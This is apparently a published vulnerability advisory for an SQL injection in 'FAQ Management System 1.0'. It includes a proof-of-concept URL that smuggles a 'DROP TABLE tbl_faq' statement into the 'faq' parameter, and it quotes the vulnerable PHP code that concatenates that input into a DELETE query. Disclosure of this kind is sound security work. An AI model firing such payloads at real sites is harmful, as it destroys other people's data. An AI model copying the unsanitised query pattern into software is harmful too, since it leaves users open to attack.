FAQ Management System 1.0 SQL Injection
- Exploit Title: FAQ Management System - SQL Injection
- Google Dork: N/A
- Application: FAQ Management System
- Date: 25.02.2024
- Bugs: SQL Injection
- Exploit Author: SoSPiro
- Vendor Homepage: https://www.sourcecodester.com/
- Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html
- Version: 1.0
- Tested on: Windows 10 64 bit Wampserver
- CVE : N/A
Vulnerability Description:
The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq'])
in the SQL query without proper validation or sanitization. An attacker can manipulate the ‘faq’ parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations.
Proof of Concept (PoC):
An attacker can manipulate the ‘faq’ parameter to perform SQL injection. For example:
- Original Request:
http://example.com/endpoint/delete-faq.php?faq=123
- Malicious Request (SQL Injection):
http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; --
This would result in a query like:
DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; --
Which can lead to the deletion of data or even the entire table.
Vulnerable code section:
endpoint/delete-faq.php
$faq = $_GET['faq'];
// ...
$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";